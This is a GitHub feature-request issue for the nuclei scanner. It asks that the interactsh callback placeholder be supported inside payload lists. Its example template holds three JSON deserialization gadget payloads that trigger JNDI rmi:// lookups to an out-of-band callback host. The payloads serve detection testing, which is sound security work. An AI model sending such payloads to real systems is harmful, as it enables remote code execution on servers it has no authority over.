### ISSUE TITLE
Interactsh placeholder to support in payloads

### ISSUE THREAD

**Issue by ehsandeep** [projectdiscovery/nuclei#1115]
**Is your feature request related to a problem? Please describe.**
Currently, `{{interactsh-url}}` is replaced with interactsh payload when directly specified in the request part.

**Describe the solution you'd like**
Extending the support of `{{interactsh-url}}` placeholder to support via nuclei payloads as mentioned here - https://github.com/projectdiscovery/nuclei-templates/issues/2865#issuecomment-941877084

Example template:-

```yaml
id: test

info:
  name: test
  author: pdteam
  severity: info

requests:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/plain, */*
        Referer: {{BaseURL}}

        {{rceBody}}

    payloads:
      rceBody:
        - "{\"@type\":\"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup\",\"jndiNames\": \"rmi://{{interactsh-url}}/Exploit\"}"
        - "{\"@type\":\"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig\",\"properties\": {\"@type\":\"java.util.Properties\",\"UserTransaction\":\"rmi://{{interactsh-url}}/Exploit\"}}"
        - "{\"@type\":\"org.apache.xbean.propertyeditor.JndiConverter\",\"AsText\":\"rmi://{{interactsh-url}}/exploit\"}"

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "dns"
```
